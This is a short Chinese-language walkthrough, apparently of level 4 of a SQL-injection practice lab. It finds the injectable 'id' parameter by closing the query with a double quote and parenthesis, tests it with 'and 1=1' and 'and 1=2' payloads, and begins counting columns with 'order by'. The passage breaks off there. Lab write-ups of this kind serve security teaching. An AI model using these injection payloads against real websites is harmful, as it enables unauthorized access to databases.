打开第四关页面,提示给id赋值可查询出对应的数据,存在可变参数id,注入可能存在。
1、判断注入点及注入类型
id=1’ 加入单引号,页面正常
id=1" 加入双引号,页面报错
根据提示的报错信息,进行语句的闭合:
?id=1")%23 页面正常,说明闭合成功
?id=1") and 1=1%23 页面正常
?id=1") and 1=2%23 页面异常
至此,说明注入点为id参数,且为字符型双引号注入。
2、判断字段数
逐步采用二分法进行列数判断
?id=1") order by 3%23 页面正常